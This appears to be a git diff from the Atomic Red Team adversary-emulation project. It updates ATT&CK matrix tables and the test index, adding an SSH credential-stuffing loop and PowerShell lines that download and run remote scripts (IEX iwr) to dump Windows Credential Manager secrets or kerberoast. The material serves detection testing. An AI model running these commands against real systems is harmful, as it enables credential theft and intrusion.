 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) |  |  |  |  |  |  |
-|  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
+|  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) |  |  |  |  |  |  |
 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) |  |  |  |  |  |  |
 |  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
@@ -76,10 +76,10 @@
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) |  |  |  |  |  |  |  |
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
-|  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -5,7 +5,7 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -15,12 +15,12 @@
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) |  | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | [Software Deployment Tools](../../T1072/T1072.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) |  | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) |  | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
@@ -57,7 +57,7 @@
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |

atomics/Indexes/index.yaml

@@ -831,7 +831,72 @@ credential-access:
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
-    atomic_tests: []
+      identifier: T1110.004
+    atomic_tests:
+    - name: SSH Credential Stuffing From Linux
+      auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
+      description: 'Using username,password combination from a password dump to login
+        over SSH.
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        target_host:
+          description: IP Address / Hostname you want to target.
+          type: String
+          default: localhost
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires SSHPASS
+
+'
+        prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] ||
+          [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo
+          apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+'
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+          for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+    - name: SSH Credential Stuffing From MacOS
+      auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+      description: 'Using username,password combination from a password dump to login
+        over SSH.
+
+'
+      supported_platforms:
+      - macos
+      input_arguments:
+        target_host:
+          description: IP Address / Hostname you want to target.
+          type: String
+          default: localhost
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires SSHPASS
+
+'
+        prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: |
+          /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+          brew install hudochenkov/sshpass/sshpass
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+          for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
   T1552.001:
     technique:
       id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc
@@ -1048,13 +1113,40 @@ credential-access:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
         cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
           Ignore
 
 '
         name: powershell
+    - name: Dump credentials from Windows Credential Manager With PowerShell [windows
+        Credentials]
+      auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
+      description: This module will extract the credentials from Windows Credential
+        Manager
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'
+          -UseBasicParsing); Get-PasswordVaultCredentials -Force   \n"
+    - name: Dump credentials from Windows Credential Manager With PowerShell [web
+        Credentials]
+      auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
+      description: This module will extract the credentials from Windows Credential
+        Manager
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
+          -UseBasicParsing); Get-CredManCreds -Force
+
+'
   T1555.003:
     technique:
       created: '2020-02-12T18:57:36.041Z'
@@ -2247,6 +2339,7 @@ credential-access:
       - windows
       executor:
         command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
           Invoke-Kerberoast | fl
         name: powershell
@@ -2760,6 +2853,7 @@ credential-access:
 '
         get_prereq_command: |
           $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
           if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
             Expand-Archive $zippath $parentpath\wce -Force
@@ -2801,6 +2895,7 @@ credential-access:
 
 '
         get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
           Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
           New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -2855,6 +2950,7 @@ credential-access:
 
 '
         get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
